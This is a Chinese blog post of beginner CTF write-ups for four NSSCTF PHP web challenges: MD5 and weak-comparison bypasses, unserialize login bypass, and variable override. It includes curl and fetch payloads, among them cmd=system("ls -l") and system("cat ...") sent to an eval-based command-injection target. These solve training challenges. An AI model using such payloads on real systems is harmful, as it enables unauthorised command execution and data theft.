<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="utf-8">
  <title>白白毛毛</title>
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/css/_custom.css">
<meta name="generator" content="Hexo 8.1.1"></head>
<body class="bg-post">

<div class="sidebar">
    <div class="header-info">
        <a href="/"><img src="/images/avatar.jpg" class="avatar"></a>
        <div class="site-author">白白毛毛</div>
    </div>
    <nav class="nav">
        <a href="/">首页</a>
        <a href="/categories">分类</a>
        <a href="/archives">所有</a>
    </nav>
    <div class="contact-section">
        <p>If you want find me:</p>
        <div class="contact-item"><img src="/images/qq.png"> 729626523</div>
        <div class="contact-item"><img src="/images/GitHub.png"> yu-star-cyrene</div>
        <div class="contact-item"><img src="/images/email.jpg"> y19350026593</div>
    </div>
</div>

<div class="content-area">
    
<div style="height: 60px;"></div>
<div class="content-wrapper">
    <article class="post-article">
        <h1 style="text-align: center; font-size: 2.2em; margin-bottom: 20px;">nssctf学习中</h1>
        
        <div style="text-align: center; color: #999; margin-bottom: 40px; border-bottom: 1px solid #eee; padding-bottom: 20px; font-size: 0.9em;">
            <span>📅 发布: 2025-11-11</span>
            <span style="margin: 0 15px;">|</span>
            <span style="color: #007bff; font-weight: bold;">📝 更新: 2025-12-29</span>
            
            
             <span style="margin: 0 15px;">|</span>
             📂 刷题
            
        </div>
        
        <div class="article-content">
            <p>这是一个基于nssctf做题的wp，本人纯新手。<br>做题没有顺序，基本是看我自己写哪一题，就写这题的wp，不分难度的。</p>
<h1 id="1-NSSCTF-2022-Spring-Recruit-babyphp"><a href="#1-NSSCTF-2022-Spring-Recruit-babyphp" class="headerlink" title="#1.[NSSCTF 2022 Spring Recruit]babyphp"></a>#1.[NSSCTF 2022 Spring Recruit]babyphp</h1><p>题目内容:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">\&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">include_once(&#x27;flag.php&#x27;);</span><br><span class="line">if(isset($_POST[&#x27;a&#x27;])&amp;&amp;!preg_match(&#x27;/[0-9]/&#x27;,$_POST[&#x27;a&#x27;])&amp;&amp;intval($_POST[&#x27;a&#x27;]))&#123;</span><br><span class="line">    if(isset($_POST[&#x27;b1&#x27;])&amp;&amp;$_POST[&#x27;b2&#x27;])&#123;</span><br><span class="line">        if($_POST[&#x27;b1&#x27;]!=$_POST[&#x27;b2&#x27;]&amp;&amp;md5($_POST[&#x27;b1&#x27;])===md5($_POST[&#x27;b2&#x27;]))&#123;</span><br><span class="line">            if($_POST[&#x27;c1&#x27;]!=$_POST[&#x27;c2&#x27;]&amp;&amp;is_string($_POST[&#x27;c1&#x27;])&amp;&amp;is_string($_POST[&#x27;c2&#x27;])&amp;&amp;md5($_POST[&#x27;c1&#x27;])==md5($_POST[&#x27;c2&#x27;]))&#123;</span><br><span class="line">                echo $flag;</span><br><span class="line">            &#125;else&#123;</span><br><span class="line">                echo &quot;yee&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo &quot;nop&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        echo &quot;go on&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;let&#x27;s get some php&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt; let&#x27;s get some php_</span><br></pre></td></tr></table></figure>



<p>分析代码<br>首先，<code>isset($_POST[&#39;a&#39;]) &amp;&amp; !preg_match(&#39;/[0-9]/&#39;, $_POST[&#39;a&#39;]) &amp;&amp; intval($_POST[&#39;a&#39;])</code><br>存在a，a不含0-9的数字，intval($_POST[‘a’]) 必须为真<br>查询代码，intval() 在转换时会尝试从字符串开头提取数字，直到遇到非数字字符。<br>preg_match 是 PHP 中用于执行正则表达式匹配的函数。<br>所有a可以用数组a[]&#x3D;1<br>这样均满足 所有条件<br>第二，isset($_POST[‘b1’]) &amp;&amp; $_POST[‘b2’]<br>b1，b2有值且非空，然后比较md5<br>同样数组，MD5返回null<br>b1[]&#x3D;2,b2[]&#x3D;3<br>最后，<code>$_POST[&#39;c1&#39;] != $_POST[&#39;c2&#39;] &amp;&amp; is_string($_POST[&#39;c1&#39;]) &amp;&amp; is_string($_POST[&#39;c2&#39;]) &amp;&amp; md5($_POST[&#39;c1&#39;]) == md5($_POST[&#39;c2&#39;])</code><br>c1与c2均为字符串，且不同，又比较md5还是若比较，上网随便查一下，用科学计数法MD5，0e被当成0，随便找md5为0e开头的字符串。<br>所以 C:\Users\G1731&gt;curl -X POST -d “a[]&#x3D;1&amp;b1[]&#x3D;1&amp;b2[]&#x3D;2&amp;c1&#x3D;240610708&amp;c2&#x3D;QNKCDZO” <a target="_blank" rel="noopener" href="http://node4.anna.nssctf.cn:28382/">http://node4.anna.nssctf.cn:28382/</a><br>用curl执行post，<br>得到flag，NSSCTF{2fd7b1ec-41c5-4895-a5d3-bc56cb172231}</p>
<hr>
<h1 id="2-HUBUCTF-2022-新生赛-checkin"><a href="#2-HUBUCTF-2022-新生赛-checkin" class="headerlink" title="#2.[HUBUCTF 2022 新生赛]checkin"></a>#2.[HUBUCTF 2022 新生赛]checkin</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$username  = &quot;this_is_secret&quot;; </span><br><span class="line">$password  = &quot;this_is_not_known_to_you&quot;; </span><br><span class="line">include(&quot;flag.php&quot;);//here I changed those two </span><br><span class="line">$info = isset($_GET[&#x27;info&#x27;])? $_GET[&#x27;info&#x27;]: &quot;&quot; ;</span><br><span class="line">$data_unserialize = unserialize($info);</span><br><span class="line">if ($data_unserialize[&#x27;username&#x27;]==$username&amp;&amp;$data_unserialize[&#x27;password&#x27;]==$password)&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    echo &quot;username or password error!&quot;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>get传参，分析一下代码<br>$username &#x3D; “this_is_secret”;<br>$password &#x3D; “this_is_not_known_to_you”;<br>定义账号，密码，然后又here I changed those two ，那直接就进入猜测阶段了，因为这用户名和密码要是有具体值，那不给其他提示就是猜了，又加上这是新生赛的题，初步猜测是空的吧。<br>$data_unserialize &#x3D; unserialize($_GET[‘info’]);<br>反序列化，去查一下作用，unserialize() 函数会将用户通过 GET 参数 info 传入的字符串，还原为 PHP 中的变量。<br>if ($data_unserialize[‘username’]&#x3D;&#x3D;$username&amp;&amp;$data_unserialize[‘password’]&#x3D;&#x3D;$password){<br>    echo $flag;<br>}else{<br>    echo “username or password error!”;<br>这一段要求弱比较我们传入的是否与服务器相等。<br>大抵思路就这样了，反序列化我不是很懂，所以问了一下ai</p>
<p>一、先明确序列化字符串的通用格式（数组类型）<br>PHP 中数组序列化后的格式是：a:数组长度:{键1的类型:键1长度:”键1值”;值1的类型:值1长度:值1内容;键2的类型:键2长度:”键2值”;值2的类型:值2长度:值2内容;}<br>a：表示变量类型是 array（数组）<br>i：表示变量类型是 integer（整数）<br>s：表示变量类型是 string（字符串）<br>冒号后的数字：表示 “长度”（数组长度 &#x2F; 字符串长度，整数无长度属性）<br>仔细看看后，我们就能推出我们要传参的值了，info&#x3D;a:2:{s:8:”username”;i:0;s:8:”password”;i:0;}<br><a target="_blank" rel="noopener" href="http://node5.anna.nssctf.cn:26551/?info=a:2:%7Bs:8:%22username%22;i:0;s:8:%22password%22;i:0;%7D">http://node5.anna.nssctf.cn:26551/?info=a:2:{s:8:%22username%22;i:0;s:8:%22password%22;i:0;}</a><br>拿下flag<br>NSSCTF{ecd62ebd-98ea-4a71-aded-efab0995f71d}<br>也是运气好一点，弱比较成立了，不然又要卡一会了。</p>
<hr>
<h1 id="3-羊城杯-2020-easycon"><a href="#3-羊城杯-2020-easycon" class="headerlink" title="#3.[羊城杯 2020]easycon"></a>#3.[羊城杯 2020]easycon</h1><p><a target="_blank" rel="noopener" href="http://node4.anna.nssctf.cn:28048/%EF%BC%8C%E7%BB%99%E4%BA%86%E4%B8%AA%E9%9D%B6%E6%9C%BA%E7%82%B9%E8%BF%9B%E5%8E%BB%E4%B8%80%E7%9C%8B">http://node4.anna.nssctf.cn:28048/，给了个靶机点进去一看</a><br><img src="/images/QQ20251114-185817.png" alt="alt text"><br>看到这个，我还以为我开错网站，看得跟什么软件的官方网站一样，确认几次后，才肯定这是我们题目的网站，嗯，没什么具体的思路，扫一扫</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">开始扫描......</span><br><span class="line">http://node4.anna.nssctf.cn:28048/index.php</span><br><span class="line">http://node4.anna.nssctf.cn:28048/.htaccess-local</span><br><span class="line">http://node4.anna.nssctf.cn:28048/.htaccess.txt</span><br><span class="line">http://node4.anna.nssctf.cn:28048/.htaccess/</span><br><span class="line">http://node4.anna.nssctf.cn:28048/.htaccess.BAK</span><br></pre></td></tr></table></figure>
<p>没什么特别明显的东西，看一下robot</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">http://node4.anna.nssctf.cn:28048/robots.txt</span><br><span class="line">&lt;!DOCTYPE HTML PUBLIC &quot;-//IETF//DTD HTML 2.0//EN&quot;&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">&lt;title&gt;404 Not Found&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;Not Found&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;The requested URL was not found on this server.&lt;/p&gt;</span><br><span class="line">&lt;hr&gt;</span><br><span class="line">&lt;address&gt;Apache/2.4.41 (Ubuntu) Server at node4.anna.nssctf.cn Port 28048&lt;/address&gt;</span><br><span class="line">&lt;/body&gt;&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>404都来了，看来目前是彻底没头绪了，看看能不能直接访问源码<br>C:\Users\G1731&gt;curl <a target="_blank" rel="noopener" href="http://node4.anna.nssctf.cn:28048/index.php">http://node4.anna.nssctf.cn:28048/index.php</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;head&gt;</span><br><span class="line">     &lt;style&gt; div.main &#123; margin-left:auto; margin-right:auto;  &#125; body &#123; background-color:        #FAEBA7; &#125;&lt;/style&gt;</span><br><span class="line">     &lt;title&gt;</span><br><span class="line">       welcome to YCBCTF</span><br><span class="line">     &lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=gw2.jpg  width=49% height=60%&gt;</span><br><span class="line">    &lt;img src=gw.jpg  width=49% height=60%&gt;</span><br><span class="line"></span><br><span class="line">    &lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(&#x27;eval post cmd&#x27;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>直接访问网站是加载不出来的，我用curl才有回应，这个代码告诉我们通过POST请求提交cmd，利用eval执行命令，那我们就试一试我的常用两件套，ls -la与cat</p>
<figure class="highlight plaintext"><figcaption><span>-X POST -H "Content-Type: application/x-www-form-urlencoded" -d "cmd</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">     &lt;style&gt; div.main &#123; margin-left:auto; margin-right:auto;  &#125; body &#123; background-color:        #FAEBA7; &#125;&lt;/style&gt;</span><br><span class="line">     &lt;title&gt;</span><br><span class="line">       welcome to YCBCTF</span><br><span class="line">     &lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=gw2.jpg  width=49% height=60%&gt;</span><br><span class="line">    &lt;img src=gw.jpg  width=49% height=60%&gt;</span><br><span class="line"></span><br><span class="line">    &lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(&#x27;eval post cmd&#x27;)&lt;/script&gt;total 64</span><br><span class="line">drwxr-xr-x    1 root root 4096 Nov 14 09:52 .</span><br><span class="line">drwxr-xr-x    1 root root 4096 Nov 14 09:52 ..</span><br><span class="line">-rwxr-xr-x    1 root root    0 Nov 14 09:52 .dockerenv</span><br><span class="line">lrwxrwxrwx    1 root root    7 Oct  6  2021 bin -&gt; usr/bin</span><br><span class="line">drwxr-xr-x    2 root root 4096 Apr 15  2020 boot</span><br><span class="line">drwxr-xr-x    5 root root  340 Nov 14 09:52 dev</span><br><span class="line">drwxr-xr-x    1 root root 4096 Nov 14 09:52 etc</span><br><span class="line">drwxr-xr-x    2 root root 4096 Apr 15  2020 home</span><br><span class="line">lrwxrwxrwx    1 root root    7 Oct  6  2021 lib -&gt; usr/lib</span><br><span class="line">lrwxrwxrwx    1 root root    9 Oct  6  2021 lib32 -&gt; usr/lib32</span><br><span class="line">lrwxrwxrwx    1 root root    9 Oct  6  2021 lib64 -&gt; usr/lib64</span><br><span class="line">lrwxrwxrwx    1 root root   10 Oct  6  2021 libx32 -&gt; usr/libx32</span><br><span class="line">drwxr-xr-x    2 root root 4096 Oct  6  2021 media</span><br><span class="line">drwxr-xr-x    2 root root 4096 Oct  6  2021 mnt</span><br><span class="line">drwxr-xr-x    2 root root 4096 Oct  6  2021 opt</span><br><span class="line">dr-xr-xr-x 1082 root root    0 Nov 14 09:52 proc</span><br><span class="line">drwx------    2 root root 4096 Oct  6  2021 root</span><br><span class="line">drwxr-xr-x    1 root root 4096 Jan 19  2022 run</span><br><span class="line">lrwxrwxrwx    1 root root    8 Oct  6  2021 sbin -&gt; usr/sbin</span><br><span class="line">drwxr-xr-x    2 root root 4096 Oct  6  2021 srv</span><br><span class="line">dr-xr-xr-x   13 root root    0 Nov 14 09:52 sys</span><br><span class="line">drwxrwxrwt    1 root root 4096 Nov 14 09:52 tmp</span><br><span class="line">drwxr-xr-x    1 root root 4096 Oct  6  2021 usr</span><br><span class="line">drwxr-xr-x    1 root root 4096 Jan 19  2022 var</span><br></pre></td></tr></table></figure>
<p>我靠，居然没看见flag相关的文件，那猫猫学长暂时不能出击了，再看看网站目录有没有</p>
<figure class="highlight plaintext"><figcaption><span>&#123;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">    method: &#x27;POST&#x27;,</span><br><span class="line">    headers: &#123;&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;&#125;,</span><br><span class="line">    body: &#x27;cmd=system(&quot;ls -l&quot;);&#x27;</span><br><span class="line">&#125;)</span><br><span class="line">.then(r =&gt; r.text())</span><br><span class="line">.then(data =&gt; console.log(data))</span><br><span class="line">.catch(error =&gt; console.error(&#x27;Error:&#x27;, error));</span><br><span class="line">Promise &#123;&lt;pending&gt;&#125;</span><br><span class="line">VM21:1 Fetch finished loading: POST &quot;http://node4.anna.nssctf.cn:28048/index.php&quot;.</span><br><span class="line">(anonymous) @ VM21:1</span><br><span class="line">VM21:7 </span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">     &lt;style&gt; div.main &#123; margin-left:auto; margin-right:auto;  &#125; body &#123; background-color: 	#FAEBA7; &#125;&lt;/style&gt;</span><br><span class="line">     &lt;title&gt;</span><br><span class="line">       welcome to YCBCTF</span><br><span class="line">     &lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;img src=gw2.jpg  width=49% height=60%&gt;</span><br><span class="line">    &lt;img src=gw.jpg  width=49% height=60%&gt;</span><br><span class="line">    </span><br><span class="line">    &lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;alert(&#x27;eval post cmd&#x27;)&lt;/script&gt;total 220</span><br><span class="line">-rwxrwxrwx 1 root root 129904 Aug 29  2020 bbbbbbbbb.txt</span><br><span class="line">-rwxrwxrwx 1 root root  49898 Aug 29  2020 gw.jpg</span><br><span class="line">-rwxrwxrwx 1 root root  22308 Aug 29  2020 gw2.jpg</span><br><span class="line">-rwxrwxrwx 1 root root  10918 Jan 19  2022 index.html</span><br><span class="line">-rwxrwxrwx 1 root root    394 Aug 29  2020 index.php</span><br></pre></td></tr></table></figure>
<p>其实本来想用curl的，但是一直显示没连接上服务器，只能试一试JavaScript了，不过还好成功了，这里面返回了一个巨可疑的文件，bbbbbbbbb.txt，就是它，拿下</p>
<figure class="highlight plaintext"><figcaption><span>&#123;</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">    method: &#x27;POST&#x27;,</span><br><span class="line">    headers: &#123;&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;&#125;,</span><br><span class="line">    body: &#x27;cmd=system(&quot;cat bbbbbbbbb.txt&quot;);&#x27;</span><br><span class="line">&#125;)</span><br><span class="line">.then(r =&gt; r.text())</span><br><span class="line">.then(data =&gt; console.log(data))</span><br><span class="line">.catch(error =&gt; console.error(&#x27;Error:&#x27;, error));</span><br></pre></td></tr></table></figure>
<p>执行该post后，我们得到了一串特别特别长的base64</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/script&gt;/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAYJ..........................................</span><br></pre></td></tr></table></figure>
<p>很长很长，我就不贴出来了，我放出来的不足千分之一，稍微研究了一下，发现这是图片base64解码的结果，我们扔给随波逐流，让它解码一下，最后得到这么一张图片<br><img src="/images/image_1.jpg" alt="alt text"><br>这图片上是什么人我不知道，但flag来了<br><strong>GWHT{do_u_kn0w_c@idao}</strong><br><strong>改成nssctf形式，NSSCTF{do_u_kn0w_c@idao}</strong></p>
<hr>
<h1 id="4-GDOUCTF-2023-受不了一点"><a href="#4-GDOUCTF-2023-受不了一点" class="headerlink" title="#4.[GDOUCTF 2023]受不了一点"></a>#4.[GDOUCTF 2023]受不了一点</h1><p>给了一个靶机，点开看一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">error_reporting(0);</span><br><span class="line">header(&quot;Content-type:text/html;charset=utf-8&quot;);</span><br><span class="line">if(isset($_POST[&#x27;gdou&#x27;])&amp;&amp;isset($_POST[&#x27;ctf&#x27;]))&#123;</span><br><span class="line">    $b=$_POST[&#x27;ctf&#x27;];</span><br><span class="line">    $a=$_POST[&#x27;gdou&#x27;];</span><br><span class="line">    if($_POST[&#x27;gdou&#x27;]!=$_POST[&#x27;ctf&#x27;] &amp;&amp; md5($a)===md5($b))&#123;</span><br><span class="line">        if(isset($_COOKIE[&#x27;cookie&#x27;]))&#123;</span><br><span class="line">           if ($_COOKIE[&#x27;cookie&#x27;]==&#x27;j0k3r&#x27;)&#123;</span><br><span class="line">               if(isset($_GET[&#x27;aaa&#x27;]) &amp;&amp; isset($_GET[&#x27;bbb&#x27;]))&#123;</span><br><span class="line">                  $aaa=$_GET[&#x27;aaa&#x27;];</span><br><span class="line">                  $bbb=$_GET[&#x27;bbb&#x27;];</span><br><span class="line">                 if($aaa==114514 &amp;&amp; $bbb==114514 &amp;&amp; $aaa!=$bbb)&#123;</span><br><span class="line">                   $give = &#x27;cancanwordflag&#x27;;</span><br><span class="line">                   $get =&#x27;hacker!&#x27;;</span><br><span class="line">                   if(isset($_GET[&#x27;flag&#x27;]) &amp;&amp; isset($_POST[&#x27;flag&#x27;]))&#123;</span><br><span class="line">                         die($give);</span><br><span class="line">                    &#125;</span><br><span class="line">                   if($_POST[&#x27;flag&#x27;] === &#x27;flag&#x27; || $_GET[&#x27;flag&#x27;] === &#x27;flag&#x27;)&#123;</span><br><span class="line">                       die($get);</span><br><span class="line">                    &#125;</span><br><span class="line">                    foreach ($_POST as $key =&gt; $value) &#123;</span><br><span class="line">                        $$key = $value;</span><br><span class="line">                   &#125;</span><br><span class="line">                    foreach ($_GET as $key =&gt; $value) &#123;</span><br><span class="line">                         $$key = $$value;</span><br><span class="line">                    &#125;</span><br><span class="line">                   echo $flag;</span><br><span class="line">            &#125;else&#123;</span><br><span class="line">                  echo &quot;洗洗睡吧&quot;;</span><br><span class="line">                 &#125;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        echo &quot;行不行啊细狗&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">  echo &#x27;菜菜&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">  echo &quot;就这?&quot;;</span><br><span class="line">&#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">  echo &quot;别来沾边&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line">别来沾边</span><br></pre></td></tr></table></figure>
<p>想要获得flag，要过5关。</p>
<p>1.<code>if($_POST[&#39;gdou&#39;]!=$_POST[&#39;ctf&#39;] &amp;&amp; md5($a)===md5($b)){</code></p>
<p>md5碰撞，弱比较，利用数组md5返回为null，构造两个数组。</p>
<p>2.<code>if(isset($_COOKIE[&#39;cookie&#39;])){ if ($_COOKIE[&#39;cookie&#39;]==&#39;j0k3r&#39;){</code></p>
<p>强制cookie，Cookie: cookie&#x3D;j0k3r。</p>
<p>3.<code>if($aaa==114514 &amp;&amp; $bbb==114514 &amp;&amp; $aaa!=$bbb){</code></p>
<p>依旧弱比较，aaa不等于bbb，根据字符串在弱比较时会转化成数字，直接搞定。</p>
<p>4.<code>if(isset($_GET[&#39;flag&#39;]) &amp;&amp; isset($_POST[&#39;flag&#39;])){     die($give);   } if($_POST[&#39;flag&#39;] === &#39;flag&#39; || $_GET[&#39;flag&#39;] === &#39;flag&#39;){     die($get); }</code><br>如果post或者get出现flag，直接die掉。</p>
<p>5.<code>foreach ($_POST as $key =&gt; $value) {     $$key = $value; } foreach ($_GET as $key =&gt; $value) {     $$key = $$value; } echo $flag;</code></p>
<p>想要获得flag，就不能覆盖flag的变量名，即在整个post和get的历遍过程中完全不触flag。</p>
<p><strong>所以我们最后的指令就完成了。</strong></p>
<p><strong>curl -X POST “<a target="_blank" rel="noopener" href="http://node4.anna.nssctf.cn:28925/?aaa=114514&bbb=114514a">http://node4.anna.nssctf.cn:28925/?aaa=114514&amp;bbb=114514a</a>“  -H “Cookie: cookie&#x3D;j0k3r” -d “gdou[]&#x3D;1&amp;ctf[]&#x3D;2”</strong></p>
<p>拿到flag，<strong>NSSCTF{2de514f9-94c3-4f50-b0fe-168893466643}</strong><br>这题其实最后一步有点搞的，我一开始都没看懂是啥，要怎么不影响flag，也是大道至简的拿到flag了。</p>
<hr>
<ol start="5">
<li></li>
</ol>
<hr>
<hr>
<p>版权声明：本文由白白毛毛创作，转载请注明出处。</p>

        </div>
    </article>
</div>

</div>

<script src="/js/main.js?v=1767442695293"></script>
</body>
</html>
